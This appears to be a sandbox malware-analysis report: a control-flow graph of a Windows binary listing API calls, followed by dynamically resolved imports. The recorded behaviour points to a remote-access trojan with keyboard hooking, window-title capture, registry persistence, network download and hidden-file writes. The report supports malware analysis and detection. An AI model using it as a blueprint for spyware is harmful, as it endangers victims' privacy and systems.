53651->54024 53654 40e126 53656 401f66 28 API calls 53654->53656 53659 40e135 53656->53659 53657 40e1fd 53823 40cbac 53657->53823 53658 41b013 28 API calls 53661 40e177 53658->53661 53662 41a891 79 API calls 53659->53662 53814 41265c RegOpenKeyExW 53661->53814 53664 40e13a 53662->53664 53666 401eea 26 API calls 53664->53666 53666->53648 53671 401e13 26 API calls 53674 40e198 53671->53674 53672 40e1c0 DeleteFileW 53673 40e1c7 53672->53673 53672->53674 53676 41b013 28 API calls 53673->53676 53674->53672 53674->53673 53675 40e1ae Sleep 53674->53675 54025 401e07 53675->54025 53677 40e1d7 53676->53677 53819 412a52 RegOpenKeyExW 53677->53819 53680 40e1ea 53681 401e13 26 API calls 53680->53681 53682 40e1f4 53681->53682 53683 401e13 26 API calls 53682->53683 53683->53657 53684->53368 53685->53376 53686->53372 53687->53382 53688->53384 53689->53387 53690->53362 53691->53365 53692->53369 53693->53391 53694->53393 53695->53396 53696->53394 53698 44dfeb 53697->53698 53699 44dfe2 53697->53699 53698->53405 53702 44ded8 51 API calls 4 library calls 53699->53702 53701->53405 53702->53698 53704 41bf2d LoadLibraryA GetProcAddress 53703->53704 53705 41bf1d GetModuleHandleA GetProcAddress 53703->53705 53706 41bf56 32 API calls 53704->53706 53707 41bf46 LoadLibraryA GetProcAddress 53704->53707 53705->53704 53706->53410 53707->53706 54029 41a84a FindResourceA 53708->54029 53711 43aa9c ___std_exception_copy 21 API calls 53712 40e26a ctype 53711->53712 53713 401f86 28 API calls 53712->53713 53714 40e285 53713->53714 53715 401eef 26 API calls 53714->53715 53716 40e290 53715->53716 53717 401eea 26 API calls 53716->53717 53718 40e299 53717->53718 53719 43aa9c ___std_exception_copy 21 API calls 53718->53719 53720 40e2aa ctype 53719->53720 54032 406052 53720->54032 53722 40e2dd 53722->53412 53724 40e9a2 53723->53724 53726 40e9b2 53724->53726 54035 40200a 26 API calls 53724->54035 53726->53420 54036 401e8f 53727->54036 53729 40bee1 CreateMutexA GetLastError 53729->53467 54038 41b366 53730->54038 53732 41a67c 54042 4125eb RegOpenKeyExA 53732->54042 53735 401eef 26 API calls 53736 41a6aa 53735->53736 53737 401eea 26 API calls 53736->53737 53738 41a6b2 53737->53738 53739 41a705 53738->53739 53740 4125eb 31 API calls 53738->53740 53739->53472 53741 41a6d8 53740->53741 53742 41a6e3 StrToIntA 53741->53742 53743 41a6f1 53742->53743 53744 41a6fa 53742->53744 54047 41c30d 28 API calls 53743->54047 53745 401eea 26 API calls 53744->53745 53745->53739 53748 40698f 53747->53748 53749 41258f 3 API calls 53748->53749 53750 406996 53749->53750 53750->53484 53750->53485 53752 41b027 53751->53752 53753 40b027 28 API calls 53752->53753 53754 41b02f 53753->53754 53754->53498 53756 401e27 53755->53756 53758 401e33 53756->53758 54048 402121 26 API calls 53756->54048 53758->53501 53760 412998 53759->53760 53761 406052 28 API calls 53760->53761 53762 4129ad 53761->53762 53763 401fbd 28 API calls 53762->53763 53764 4129bd 53763->53764 53765 4127aa 29 API calls 53764->53765 53766 4129c7 53765->53766 53767 401eea 26 API calls 53766->53767 53768 4129d4 53767->53768 53768->53548 53770 4127fa 53769->53770 53771 4127c3 53769->53771 53772 401eea 26 API calls 53770->53772 53774 4127d5 RegSetValueExA RegCloseKey 53771->53774 53773 40de0e 53772->53773 53773->53551 53774->53770 53776 409536 _wcslen 53775->53776 53777 409541 53776->53777 53778 409558 53776->53778 53779 40c89e 32 API calls 53777->53779 53780 40c89e 32 API calls 53778->53780 53781 409549 53779->53781 53782 409560 53780->53782 53783 401e18 26 API calls 53781->53783 53784 401e18 26 API calls 53782->53784 53785 409553 53783->53785 53786 40956e 53784->53786 53788 401e13 26 API calls 53785->53788 53787 401e13 26 API calls 53786->53787 53789 409576 53787->53789 53790 4095ad 53788->53790 54064 40856b 28 API calls 53789->54064 54049 409837 53790->54049 53793 409588 54065 4028cf 53793->54065 53796 409593 53797 401e18 26 API calls 53796->53797 53798 40959d 53797->53798 53799 401e13 26 API calls 53798->53799 53799->53785 53801 403b40 28 API calls 53800->53801 53802 41a9fc 53801->53802 54234 403cbb 53802->54234 53804 41aa08 53805 4028cf 28 API calls 53804->53805 53806 41aa12 53805->53806 53807 401e13 26 API calls 53806->53807 53808 41aa1b 53807->53808 53809 401e13 26 API calls 53808->53809 53810 40e096 53809->53810 53810->53628 53812 412567 RegQueryValueExA RegCloseKey 53811->53812 53813 40e15e 53811->53813 53812->53813 53813->53657 53813->53658 53815 4126b5 53814->53815 53816 412688 RegQueryValueExW RegCloseKey 53814->53816 53817 403b40 28 API calls 53815->53817 53816->53815 53818 40e18d 53817->53818 53818->53671 53820 412a6a RegDeleteValueW 53819->53820 53821 412a7e 53819->53821 53820->53821 53822 412a7a 53820->53822 53821->53680 53822->53680 53824 40cbc5 53823->53824 53825 412546 3 API calls 53824->53825 53826 40cbcc 53825->53826 53827 40cbeb 53826->53827 54248 401602 53826->54248 53831 40cc37 53827->53831 53829 40cbd9 54251 4128ad RegCreateKeyA 53829->54251 53832 40cc4b 53831->53832 53833 412546 3 API calls 53832->53833 53834 40cc52 53833->53834 53835 40cc81 53834->53835 53836 40cc57 53834->53836 53840 41258f 3 API calls 53835->53840 53837 401602 27 API calls 53836->53837 53838 40cc5e 53837->53838 54268 43eadd 53838->54268 53842 40cc7f 53840->53842 53846 4140ac 53842->53846 53844 40cc6a 53845 4128ad 3 API calls 53844->53845 53845->53842 53847 4140c3 53846->53847 54305 41ac7e 53847->54305 53849 4140ce 53850 401d64 28 API calls 53849->53850 53851 4140e7 53850->53851 53852 43a7f7 42 API calls 53851->53852 53853 4140f4 53852->53853 53854 414106 53853->53854 53855 4140f9 Sleep 53853->53855 53856 401f66 28 API calls 53854->53856 53855->53854 53857 414115 53856->53857 53858 401d64 28 API calls 53857->53858 53859 414123 53858->53859 53860 401fbd 28 API calls 53859->53860 53861 41412b 53860->53861 53862 41b1ce 28 API calls 53861->53862 53863 414133 53862->53863 54309 404262 WSAStartup 53863->54309 53865 41413d 53866 401d64 28 API calls 53865->53866 53867 414146 53866->53867 53868 401d64 28 API calls 53867->53868 53929 4141c5 53867->53929 53869 41415f 53868->53869 53872 401d64 28 API calls 53869->53872 53870 401d64 28 API calls 53870->53929 53871 401fbd 28 API calls 53871->53929 53873 414170 53872->53873 53875 401d64 28 API calls 53873->53875 53874 41b1ce 28 API calls 53874->53929 53876 414181 53875->53876 53877 401d64 28 API calls 53876->53877 53879 414192 53877->53879 53878 4085b4 28 API calls 53878->53929 53881 401d64 28 API calls 53879->53881 53880 401eef 26 API calls 53880->53929 53882 4141a3 53881->53882 53883 401d64 28 API calls 53882->53883 53884 4141b5 53883->53884 54338 404101 87 API calls 53884->54338 53887 41431c WSAGetLastError 54339 41be81 30 API calls 53887->54339 53888 4041f1 3 API calls 53888->53929 53891 404915 104 API calls 53891->53929 53892 40428c 96 API calls 53892->53929 53893 41a891 79 API calls 53893->53929 53894 4047eb 98 API calls 53894->53929 53895 404cbf 28 API calls 53895->53929 53896 401d8c 26 API calls 53896->53929 53897 401d64 28 API calls 53898 414cfa 53897->53898 53898->53897 53899 43a7f7 42 API calls 53898->53899 53900 414d12 Sleep 53899->53900 53900->53929 53901 401f66 28 API calls 53901->53929 53904 4082dc 28 API calls 53904->53929 53905 440e5e 26 API calls 53905->53929 53906 412735 3 API calls 53906->53929 53907 4125eb 31 API calls 53907->53929 53908 403b40 28 API calls 53908->53929 53909 41aff9 28 API calls 53909->53929 53912 401d64 28 API calls 53913 4145fa GetTickCount 53912->53913 53914 41af51 28 API calls 53913->53914 53914->53929 53916 41af51 28 API calls 53916->53929 53917 41ae5d 30 API calls 53917->53929 53918 41b0d3 28 API calls 53918->53929 53920 4027ec 28 API calls 53920->53929 53921 405ce6 28 API calls 53921->53929 53922 4027cb 28 API calls 53922->53929 53923 40275c 28 API calls 53923->53929 53924 404468 60 API calls 53924->53929 53925 401eea 26 API calls 53925->53929 53926 4045d5 260 API calls 53926->53929 53927 414c76 54341 40a767 84 API calls 53927->54341 53929->53870 53929->53871 53929->53874 53929->53878 53929->53880 53929->53887 53929->53888 53929->53891 53929->53892 53929->53893 53929->53894 53929->53895 53929->53896 53929->53898 53929->53901 53929->53904 53929->53905 53929->53906 53929->53907 53929->53908 53929->53909 53929->53912 53929->53916 53929->53917 53929->53918 53929->53920 53929->53921 53929->53922 53929->53923 53929->53924 53929->53925 53929->53926 53929->53927 53930 414cb4 CreateThread 53929->53930 53931 401e13 26 API calls 53929->53931 54310 414072 53929->54310 54316 41ab78 53929->54316 54319 41375b 53929->54319 54322 40cc9a 53929->54322 54328 40cbf1 53929->54328 54334 41aeab GetLastInputInfo GetTickCount 53929->54334 54335 40e751 GetLocaleInfoA 53929->54335 54340 404c9e 28 API calls 53929->54340 53930->53929 54385 41a07f 104 API calls 53930->54385 53931->53929 53932->53428 53933->53437 53936 4085c0 53935->53936 53937 402e78 28 API calls 53936->53937 53938 4085e4 53937->53938 53938->53459 53940 4125e3 53939->53940 53941 4125b9 RegQueryValueExA RegCloseKey 53939->53941 53940->53456 53941->53940 53942->53463 53943->53491 53944->53484 53945->53475 53946->53490 53948 40c8ba 53947->53948 53949 40c8da 53948->53949 53950 40c90f 53948->53950 53953 40c8d0 53948->53953 54397 41a956 29 API calls 53949->54397 53952 41b366 2 API calls 53950->53952 53951 40ca03 GetLongPathNameW 53956 403b40 28 API calls 53951->53956 53957 40c914 53952->53957 53953->53951 53955 40c8e3 53958 401e18 26 API calls 53955->53958 53959 40ca18 53956->53959 53960 40c918 53957->53960 53961 40c96a 53957->53961 53965 40c8ed 53958->53965 53962 403b40 28 API calls 53959->53962 53964 403b40 28 API calls 53960->53964 53963 403b40 28 API calls 53961->53963 53966 40ca27 53962->53966 53967 40c978 53963->53967 53968 40c926 53964->53968 53969 401e13 26 API calls 53965->53969 54386 40cd0a 53966->54386 53974 403b40 28 API calls 53967->53974 53972 403b40 28 API calls 53968->53972 53969->53953 53976 40c93c 53972->53976 53975 40c98e 53974->53975 53978 402860 28 API calls 53975->53978 53979 402860 28 API calls 53976->53979 53977 40ca45 53980 402860 28 API calls 53977->53980 53982 40c999 53978->53982 53983 40c947 53979->53983 53981 40ca4f 53980->53981 53984 401e13 26 API calls 53981->53984 53985 401e18 26 API calls 53982->53985 53986 401e18 26 API calls 53983->53986 53987 40ca59 53984->53987 53988 40c9a4 53985->53988 53989 40c952 53986->53989 53990 401e13 26 API calls 53987->53990 53991 401e13 26 API calls 53988->53991 53992 401e13 26 API calls 53989->53992 53993 40ca62 53990->53993 53994 40c9ad 53991->53994 53995 40c95b 53992->53995 53996 401e13 26 API calls 53993->53996 53997 401e13 26 API calls 53994->53997 53998 401e13 26 API calls 53995->53998 53999 40ca6b 53996->53999 53997->53965 53998->53965 54000 401e13 26 API calls 53999->54000 54001 40ca74 54000->54001 54002 401e13 26 API calls 54001->54002 54003 40ca7d 54002->54003 54003->53537 54004->53549 54005->53571 54007 41275b RegQueryValueExA RegCloseKey 54006->54007 54008 41277f 54006->54008 54007->54008 54008->53530 54009->53563 54010->53600 54011->53609 54013 401f66 28 API calls 54012->54013 54014 40c86b 54013->54014 54015 41b013 28 API calls 54014->54015 54016 40c876 54015->54016 54017 40c89e 32 API calls 54016->54017 54018 40c887 54017->54018 54019 401e13 26 API calls 54018->54019 54020 40c890 54019->54020 54021 401eea 26 API calls 54020->54021 54022 40c898 54021->54022 54022->53636 54023->53621 54024->53654 54026 401e0c 54025->54026 54027->53480 54030 41a867 LoadResource LockResource SizeofResource 54029->54030 54031 40e25b 54029->54031 54030->54031 54031->53711 54033 401f86 28 API calls 54032->54033 54034 406066 54033->54034 54034->53722 54035->53726 54037 401e94 54036->54037 54039 41b373 GetCurrentProcess IsWow64Process 54038->54039 54040 41b38e 54038->54040 54039->54040 54041 41b38a 54039->54041 54040->53732 54041->53732 54043 412619 RegQueryValueExA RegCloseKey 54042->54043 54044 412641 54042->54044 54043->54044 54045 401f66 28 API calls 54044->54045 54046 412656 54045->54046 54046->53735 54047->53744 54048->53758 54050 409855 54049->54050 54051 41258f 3 API calls 54050->54051 54052 40985c 54051->54052 54053 409870 54052->54053 54054 40988a 54052->54054 54055 4095cf 54053->54055 54056 409875 54053->54056 54068 4082dc 54054->54068 54055->53594 54058 4082dc 28 API calls 54056->54058 54060 409883 54058->54060 54094 409959 29 API calls 54060->54094 54063 409888 54063->54055 54064->53793 54225 402d8b 54065->54225 54067 4028dd 54067->53796 54069 4082eb 54068->54069 54095 408431 54069->54095 54071 408309 54072 4098a5 54071->54072 54100 40affa 54072->54100 54075 4098f6 54077 401f66 28 API calls 54075->54077 54076 4098ce 54078 401f66 28 API calls 54076->54078 54079 409901 54077->54079 54080 4098d8 54078->54080 54082 401f66 28 API calls 54079->54082 54081 41b013 28 API calls 54080->54081 54083 4098e6 54081->54083 54084 409910 54082->54084 54104 40a876 31 API calls ___std_exception_copy 54083->54104 54086 41a891 79 API calls 54084->54086 54088 409915 CreateThread 54086->54088 54087 4098ed 54089 401eea 26 API calls 54087->54089 54090 409930 CreateThread 54088->54090 54091 40993c CreateThread 54088->54091 54111 4099a9 54088->54111 54089->54075 54090->54091 54108 409993 54090->54108 54092 401e13 26 API calls 54091->54092 54105 4099b5 54091->54105 54093 409950 54092->54093 54093->54055 54094->54063 54224 40999f 136 API calls 54094->54224 54096 40843d 54095->54096 54098 40845b 54096->54098 54099 402f0d 28 API calls 54096->54099 54098->54071 54099->54098 54102 40b006 54100->54102 54101 4098c3 54101->54075 54101->54076 54102->54101 54103 403b9e 28 API calls 54102->54103 54103->54101 54104->54087 54114 40a3f4 54105->54114 54151 4099e4 54108->54151 54167 409e48 54111->54167 54120 40a402 54114->54120 54115 4099be 54116 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 54118 40b027 28 API calls 54116->54118 54118->54120 54120->54115 54120->54116 54122 41aeab GetLastInputInfo GetTickCount 54120->54122 54123 40a4a2 GetWindowTextW 54120->54123 54125 40a5ff 54120->54125 54126 40affa 28 API calls 54120->54126 54128 40a569 Sleep 54120->54128 54129 440e5e 26 API calls 54120->54129 54131 401f66 28 API calls 54120->54131 54136 4028cf 28 API calls 54120->54136 54137 405ce6 28 API calls 54120->54137 54138 40a4f1 54120->54138 54139 41b013 28 API calls 54120->54139 54140 409d58 27 API calls 54120->54140 54141 401e13 26 API calls 54120->54141 54142 401eea 26 API calls 54120->54142 54143 433724 5 API calls __Init_thread_wait 54120->54143 54144 433ab0 29 API calls __onexit 54120->54144 54145 4336da EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 54120->54145 54146 4082a8 28 API calls 54120->54146 54148 40b0dd 28 API calls 54120->54148 54149 40ae58 44 API calls 2 library calls 54120->54149 54150 404c9e 28 API calls 54120->54150 54122->54120 54123->54120 54127 401e13 26 API calls 54125->54127 54126->54120 54127->54115 54128->54120 54129->54120 54131->54120 54132 4082dc 28 API calls 54132->54138 54136->54120 54137->54120 54138->54120 54138->54132 54147 40a876 31 API calls ___std_exception_copy 54138->54147 54139->54120 54140->54120 54141->54120 54142->54120 54143->54120 54144->54120 54145->54120 54146->54120 54147->54138 54148->54120 54149->54120 54150->54120 54152 409a63 GetMessageA 54151->54152 54153 4099ff GetModuleHandleA SetWindowsHookExA 54151->54153 54154 409a75 TranslateMessage DispatchMessageA 54152->54154 54165 40999c 54152->54165 54153->54152 54155 409a1b GetLastError 54153->54155 54154->54152 54154->54165 54156 41af51 28 API calls 54155->54156 54157 409a31 54156->54157 54166 404c9e 28 API calls 54157->54166 54159 409a3e 54160 401f66 28 API calls 54159->54160 54161 409a4d 54160->54161 54162 41a891 79 API calls 54161->54162 54163 409a52 54162->54163 54164 401eea 26 API calls 54163->54164 54164->54165 54166->54159 54168 409e5d Sleep 54167->54168 54187 409d97 54168->54187 54170 4099b2 54171 409eae GetFileAttributesW 54175 409e6f 54171->54175 54172 409e9d CreateDirectoryW 54172->54175 54173 409ec5 SetFileAttributesW 54173->54175 54175->54168 54175->54170 54175->54171 54175->54172 54175->54173 54177 401d64 28 API calls 54175->54177 54178 409f10 54175->54178 54200 41b79a 54175->54200 54176 409f3f PathFileExistsW 54176->54178 54177->54175 54178->54176 54180 401f86 28 API calls 54178->54180 54181 40a048 SetFileAttributesW 54178->54181 54182 406052 28 API calls 54178->54182 54183 401eef 26 API calls 54178->54183 54185 401eea 26 API calls 54178->54185 54186 401eea 26 API calls 54178->54186 54209 41b825 CreateFileW 54178->54209 54217 41b892 CreateFileW SetFilePointer WriteFile CloseHandle 54178->54217 54180->54178 54181->54175 54182->54178 54183->54178 54185->54178 54186->54175 54188 409e44 54187->54188 54191 409dad 54187->54191 54188->54175 54189 409dcc CreateFileW 54190 409dda GetFileSize 54189->54190 54189->54191 54190->54191 54192 409e0f CloseHandle 54190->54192 54191->54189 54191->54192 54193 409e21 54191->54193 54194 409e04 Sleep 54191->54194 54195 409dfd 54191->54195 54192->54191 54193->54188 54197 4082dc 28 API calls 54193->54197 54194->54192 54218 40a7f0 83 API calls 54195->54218 54198 409e3d 54197->54198 54199 4098a5 127 API calls 54198->54199 54199->54188 54201 41b7ad CreateFileW 54200->54201 54203 41b7ea 54201->54203 54204 41b7e6 54201->54204 54205 41b801 WriteFile 54203->54205 54206 41b7f1 SetFilePointer 54203->54206 54204->54175 54207 41b816 CloseHandle 54205->54207 54208 41b814 54205->54208 54206->54205 54206->54207 54207->54204 54208->54207 54210 41b84b 54209->54210 54211 41b84f GetFileSize 54209->54211 54210->54178 54219 401e65 54211->54219 54213 41b863 54214 41b875 ReadFile 54213->54214 54215 41b882 54214->54215 54216 41b884 CloseHandle 54214->54216 54215->54216 54216->54210 54217->54178 54218->54194 54220 401e6d 54219->54220 54222 401e77 54220->54222 54223 4023b7 28 API calls 54220->54223 54222->54213 54223->54222 54226 402d97 54225->54226 54229 4030f7 54226->54229 54228 402dab 54228->54067 54230 403101 54229->54230 54231 403115 54230->54231 54233 4036c2 28 API calls 54230->54233 54231->54228 54233->54231 54237 403dc2 54234->54237 54236 403cc9 54236->53804 54238 403dce 54237->54238 54241 402ffd 54238->54241 54240 403de3 54240->54236 54242 40300e 54241->54242 54243 4032a4 28 API calls 54242->54243 54244 40301a 54243->54244 54246 40302e 54244->54246 54247 4035e8 28 API calls 54244->54247 54246->54240 54247->54246 54254 4397ca 54248->54254 54252 4128ec 54251->54252 54253 4128c5 RegSetValueExA RegCloseKey 54251->54253 54252->53827 54253->54252 54257 43974b 54254->54257 54256 401608 54256->53829 54258 43975a 54257->54258 54259 43976e 54257->54259 54265 445564 20 API calls _abort 54258->54265 54264 43976a __alldvrm 54259->54264 54267 447811 11 API calls 2 library calls 54259->54267 54261 43975f 54266 43aa37 26 API calls _Deallocate 54261->54266 54264->54256 54265->54261 54266->54264 54267->54264 54276 4470cf GetLastError 54268->54276 54270 40cc64 54271 41a659 54270->54271 54302 43eabc 54271->54302 54274 43eabc 38 API calls 54275 41a66a 54274->54275 54275->53844 54277 4470e5 54276->54277 54278 4470f1 54276->54278 54297 447676 11 API calls 2 library calls 54277->54297 54298 448916 20 API calls 3 library calls 54278->54298 54281 4470eb 54281->54278 54283 44713a SetLastError 54281->54283 54282 4470fd 54289 447105 54282->54289 54299 4476cc 11 API calls 2 library calls 54282->54299 54283->54270 54285 44711a 54288 447121 54285->54288 54285->54289 54286 446cd5 _free 20 API calls 54287 44710b 54286->54287 54290 447146 SetLastError 54287->54290 54300 446f41 20 API calls __Toupper 54288->54300 54289->54286 54301 4455c6 38 API calls _abort 54290->54301 54292 44712c 54294 446cd5 _free 20 API calls 54292->54294 54296 447133 54294->54296 54296->54283 54296->54290 54297->54281 54298->54282 54299->54285 54300->54292 54303 4470cf __Toupper 38 API calls 54302->54303 54304 41a65f 54303->54304 54304->54274 54308 41acc4 ctype ___scrt_fastfail 54305->54308 54306 401f66 28 API calls 54307 41ad39 54306->54307 54307->53849 54308->54306 54309->53865 54311 414081 54310->54311 54312 41408b WSASetLastError 54310->54312 54342 413f0f 35 API calls ___std_exception_copy 54311->54342 54312->53929 54314 414086 54314->54312 54343 41ab50 GlobalMemoryStatusEx 54316->54343 54318 41ab8d 54318->53929 54344 41371e 54319->54344 54323 40ccbc ___scrt_fastfail 54322->54323 54324 412735 3 API calls 54323->54324 54325 40ccf2 54324->54325 54326 403b40 28 API calls 54325->54326 54327 40cd03 54326->54327 54327->53929 54329 40cc0d 54328->54329 54330 412546 3 API calls 54329->54330 54332 40cc14 54330->54332 54331 40cc2c 54331->53929 54332->54331 54333 41258f 3 API calls 54332->54333 54333->54331 54334->53929 54336 401f66 28 API calls 54335->54336 54337 40e776 54336->54337 54337->53929 54338->53929 54339->53929 54340->53929 54341->53929 54342->54314 54343->54318 54347 4136f1 54344->54347 54348 413706 ___scrt_initialize_default_local_stdio_options 54347->54348 54351 43e4ed 54348->54351 54354 43b240 54351->54354 54355 43b280 54354->54355 54356 43b268 54354->54356 54355->54356 54358 43b288 54355->54358 54378 445564 20 API calls _abort 54356->54378 54380 4394ee 38 API calls 2 library calls 54358->54380 54360 43b26d 54379 43aa37 26 API calls _Deallocate 54360->54379 54361 43b298 54381 43b9c6 20 API calls 2 library calls 54361->54381 54365 43b310 54382 43c034 50 API calls 3 library calls 54365->54382 54366 413714 54366->53929 54369 43b278 54371 433f37 54369->54371 54370 43b31b 54383 43ba30 20 API calls _free 54370->54383 54372 433f42 IsProcessorFeaturePresent 54371->54372 54373 433f40 54371->54373 54375 4343b4 54372->54375 54373->54366 54384 434378 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54375->54384 54377 434497 54377->54366 54378->54360 54379->54369 54380->54361 54381->54365 54382->54370 54383->54369 54384->54377 54387 40cd12 54386->54387 54388 403b9e 28 API calls 54387->54388 54389 40ca3a 54388->54389 54390 402860 54389->54390 54391 40286f 54390->54391 54392 4028b1 54391->54392 54395 4028a6 54391->54395 54399 402daf 54392->54399 54394 4028af 54394->53977 54398 402d68 28 API calls 54395->54398 54397->53955 54398->54394 54400 402dbb 54399->54400 54401 4030f7 28 API calls 54400->54401 54402 402dcd 54401->54402 54402->54394 54405 40e642 54403->54405 54404 41258f 3 API calls 54404->54405 54405->54404 54406 40e6e6 54405->54406 54408 40e6d6 Sleep 54405->54408 54425 40e674 54405->54425 54409 4082dc 28 API calls 54406->54409 54407 4082dc 28 API calls 54407->54425 54408->54405 54412 40e6f1 54409->54412 54411 41b013 28 API calls 54411->54425 54413 41b013 28 API calls 54412->54413 54414 40e6fd 54413->54414 54438 41284c 29 API calls 54414->54438 54417 401e13 26 API calls 54417->54425 54418 40e710 54419 401e13 26 API calls 54418->54419 54421 40e71c 54419->54421 54420 401f66 28 API calls 54420->54425 54422 401f66 28 API calls 54421->54422 54423 40e72d 54422->54423 54426 4127aa 29 API calls 54423->54426 54424 4127aa 29 API calls 54424->54425 54425->54407 54425->54408 54425->54411 54425->54417 54425->54420 54425->54424 54436 40bf04 73 API calls ___scrt_fastfail 54425->54436 54437 41284c 29 API calls 54425->54437 54427 40e740 54426->54427 54439 411771 TerminateProcess WaitForSingleObject 54427->54439 54429 40e748 ExitProcess 54440 41170f 61 API calls 54432->54440 54437->54425 54438->54418 54439->54429 54441 43aba8 54444 43abb4 _swprintf ___DestructExceptionObject 54441->54444 54442 43abc2 54459 445564 20 API calls _abort 54442->54459 54444->54442 54446 43abec 54444->54446 54445 43abc7 54460 43aa37 26 API calls _Deallocate 54445->54460 54454 444cdc EnterCriticalSection 54446->54454 54449 43abf7 54455 43ac98 54449->54455 54452 43abd2 __fread_nolock 54454->54449 54456 43aca6 54455->54456 54458 43ac02 54456->54458 54462 448626 39 API calls 2 library calls 54456->54462 54461 43ac1f LeaveCriticalSection std::_Lockit::~_Lockit 54458->54461 54459->54445 54460->54452 54461->54452 54462->54456 54463 402bcc 54464 402bd7 54463->54464 54465 402bdf 54463->54465 54471 403315 54464->54471 54467 402beb 54465->54467 54480 4015d3 54465->54480 54472 4015d3 22 API calls 54471->54472 54473 40332a 54472->54473 54474 402bdd 54473->54474 54475 40333b 54473->54475 54490 43a9bc 26 API calls 4 library calls 54475->54490 54477 43aa56 54491 43aa64 11 API calls _abort 54477->54491 54479 43aa63 54482 433818 54480->54482 54481 43aa9c ___std_exception_copy 21 API calls 54481->54482 54482->54481 54483 402be9 54482->54483 54486 433839 std::_Facet_Register 54482->54486 54492 442410 7 API calls 2 library calls 54482->54492 54485 433ff7 std::_Facet_Register 54494 437de7 RaiseException 54485->54494 54486->54485 54493 437de7 RaiseException 54486->54493 54489 434014 54490->54477 54491->54479 54492->54482 54493->54485 54494->54489 54495 414f4c 54510 41a726 54495->54510 54497 414f55 54498 401fbd 28 API calls 54497->54498 54499 414f64 54498->54499 54500 404468 60 API calls 54499->54500 54501 414f70 54500->54501 54502 401eea 26 API calls 54501->54502 54503 414f79 54502->54503 54504 401d8c 26 API calls 54503->54504 54505 4163d6 54504->54505 54506 401eea 26 API calls 54505->54506 54507 4163e2 54506->54507 54508 401eea 26 API calls 54507->54508 54509 4163ee 54508->54509 54511 41a734 54510->54511 54512 43aa9c ___std_exception_copy 21 API calls 54511->54512 54513 41a73e InternetOpenW InternetOpenUrlW 54512->54513 54514 41a767 InternetReadFile 54513->54514 54515 41a78a 54514->54515 54515->54514 54516 41a7b7 InternetCloseHandle InternetCloseHandle 54515->54516 54517 401f86 28 API calls 54515->54517 54519 401eea 26 API calls 54515->54519 54518 41a7c9 54516->54518 54517->54515 54518->54497 54519->54515 54520 42629c 54525 426319 send 54520->54525

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF03
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BF0C
                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF23
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BF26
                                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF38
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BF3B
                                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF4C
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BF4F
                                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D856), ref: 0041BF60
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BF63
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D856), ref: 0041BF70
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BF73
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D856), ref: 0041BF80
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BF83
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D856), ref: 0041BF90
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BF93
                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D856), ref: 0041BFA4
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BFA7
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D856), ref: 0041BFB4
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BFB7
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D856), ref: 0041BFC8
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BFCB
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D856), ref: 0041BFDC
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BFDF
                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D856), ref: 0041BFF0
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BFF3
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D856), ref: 0041C000
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041C003
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D856), ref: 0041C011
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041C014
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D856), ref: 0041C021
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041C024
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D856), ref: 0041C036
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041C039
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D856), ref: 0041C046
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041C049
                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D856), ref: 0041C05B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041C05E
                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D856), ref: 0041C06B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041C06E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
